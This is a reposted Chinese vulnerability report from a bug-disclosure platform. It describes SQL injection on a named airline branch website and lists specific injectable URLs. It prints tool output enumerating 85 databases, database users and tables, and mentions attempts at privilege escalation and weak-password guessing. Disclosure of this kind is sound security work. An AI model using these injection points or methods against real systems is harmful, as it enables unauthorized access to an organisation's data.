神刀安全网

中国南方航空某分站存在SQL注入漏洞

简要描述:

rt.

详细说明:

漏洞存在于中国南方航空新疆分公司网站:http://www.xjair.com

注入点:http://www.xjair.com/articlelist.aspx?lmid=201111241132339582

http://www.xjair.com/article.aspx?id=201511021252236147

http://www.xjair.com/article.aspx?id=201510281636048110

http://www.xjair.com/article.aspx?id=201510221417206230

http://www.xjair.com/article.aspx?id=201510221416398861

http://www.xjair.com/article.aspx?id=201509101129137719

http://www.xjair.com/article.aspx?id=201509101125387361

共约62个点

取一个在神器里跑:http://www.xjair.com/article.aspx?id=201509101125387361

得到注入类型和配置参数:

中国南方航空某分站存在SQL注入漏洞

暴库得到多达85的数据库:

code 区域
available databases [85]:
[*] account
[*] agent
[*] agent_cargo
[*] Airbooking
[*] airkcb
[*] AMC
[*] aspnetdb
[*] cargo
[*] ccb_ticket
[*] CEM
[*] CEM_cargo
[*] CEM_NEW
[*] CISP
[*] CRM
[*] CWLog
[*] cwys
[*] DeptWeb_BGS
[*] DeptWeb_Bwb
[*] DeptWeb_CWB
[*] DeptWeb_DF
[*] DeptWeb_DF_KS
[*] DeptWeb_HR
[*] DeptWeb_HY
[*] DeptWeb_KCB
[*] DeptWeb_SC
[*] DeptWeb_SCB
[*] DeptWeb_SCB_KS
[*] DeptWeb_SYGS
[*] DeptWeb_VOTE
[*] DeptWeb_XXGCB
[*] DFBG
[*] download_data
[*] e_learning
[*] ECS
[*] FCS
[*] fii_csm
[*] FOC
[*] FSS
[*] fxb
[*] gh
[*] gnp_mis
[*] hwsweb
[*] indexData
[*] info
[*] ip_add
[*] iso9000
[*] jx_appraise
[*] kaoshi_v3
[*] kczb
[*] kseat
[*] kseatuser
[*] kyshj
[*] lzzc
[*] master
[*] medical
[*] mis_public
[*] model
[*] msdb
[*] Mticket
[*] MyFlightBudgetDB
[*] new_medical
[*] OMS
[*] plane
[*] RAS
[*] renliziyuan
[*] rlzy
[*] sms_gtp
[*] southair
[*] tang_webservice
[*] Telegraph
[*] tempdb
[*] vacation
[*] VIPIS
[*] vote
[*] webdata
[*] WorkBook
[*] WorkCertificate
[*] WorkDBCenter
[*] WorkManualFinancing
[*] WorkManualFinancingCloseOff
[*] xjhkgs
[*] XjVote
[*] XjWeb
[*] xtgl_web
[*] xxjsb

当前数据库和用户:

code 区域
current database:    'XjWeb'
current user: 'xjweb'

数据库用户:

code 区域
database management system users [2]:
[*] sa
[*] xjweb

由于权限的限制,只能在XjWeb这个库里面跑,共11张表:

code 区域
foofoofoo
Dw_Lm
DW_Wz
DW_Fj
View_GetTk
View_GetWz
View_GetLmmc
View_GetTkHot
View_GetWzHot
D99_Tmp
Dw_LmLb

用手工试了下,sysobjects和syscolumns都被禁了,不能愉快的跨库了。

中国南方航空某分站存在SQL注入漏洞

最后试了下openrowset发现也有提权的可能:

中国南方航空某分站存在SQL注入漏洞

没精力爆破sa了,试了几个弱口令都不行。就到这儿吧。因为兴趣在其他的诸如account库上,所以也没深入XjWeb库。

虽然没什么收获,但好歹也是洞啊。

漏洞证明:

已证。

修复方案:

不会。

版权声明:神刀安全网转自 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 中国南方航空某分站存在SQL注入漏洞

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮